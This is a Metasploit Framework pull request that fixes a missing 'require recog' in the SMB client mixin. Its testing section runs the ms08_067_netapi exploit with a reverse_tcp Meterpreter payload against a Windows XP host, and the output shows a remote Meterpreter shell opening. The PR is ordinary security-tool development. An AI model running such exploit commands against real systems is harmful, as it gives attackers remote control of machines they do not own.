### PR TITLE
Fix #4471, uninitialized constant Msf::Exploit::Remote::SMB::Recog

### DIFF
--- a/lib/msf/core/exploit/smb/client.rb
+++ b/lib/msf/core/exploit/smb/client.rb
@@ -3,6 +3,7 @@ require 'rex/proto/smb'
 require 'rex/proto/ntlm'
 require 'rex/proto/dcerpc'
 require 'rex/encoder/ndr'
+require 'recog'
 
 module Msf
   module Exploit::Remote::SMB


### PR DESCRIPTION
Fix #4471

So for some reason, Recog does not load (in the correct order, or at all) when you use ms08_067 with msfcli in kali. I managed to repro the issue and here's my fix for it. I am not sure if everybody on kali can actually hit the same bug (because @void-in didn't), so the verification goal here is that with this patch, you should not see any breakage for ms08_067_netapi.
## Testing
- [x] Please follow this msfli demo and make sure you don't see an uninit recog error:

```
$ ./msfcli exploits/windows/smb/ms08_067_netapi rhost=192.168.1.80 payload=windows/meterpreter/reverse_tcp lhost=192.168.1.64 E
[!] ************************************************************************
[!] *               The utility msfcli is deprecated!                      *
[!] *            It will be removed on or about 2015-06-18                 *
[!] *              Please use msfconsole -r or -x instead                  *
[!] *  Details: https://github.com/rapid7/metasploit-framework/pull/3802   *
[!] ************************************************************************
[*] Initializing modules...
rhost => 192.168.1.80
payload => windows/meterpreter/reverse_tcp
lhost => 192.168.1.64
[*] Started reverse handler on 192.168.1.64:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (785920 bytes) to 192.168.1.80

meterpreter >
```
- [x] Also follow this msfconsole demo and make sure you don't see the error either:

```
$ ./msfconsole -q
msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set rhost 192.168.1.80
rhost => 192.168.1.80
msf exploit(ms08_067_netapi) > run

[*] Started reverse handler on 192.168.1.64:4444 
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (785920 bytes) to 192.168.1.80

meterpreter >
```
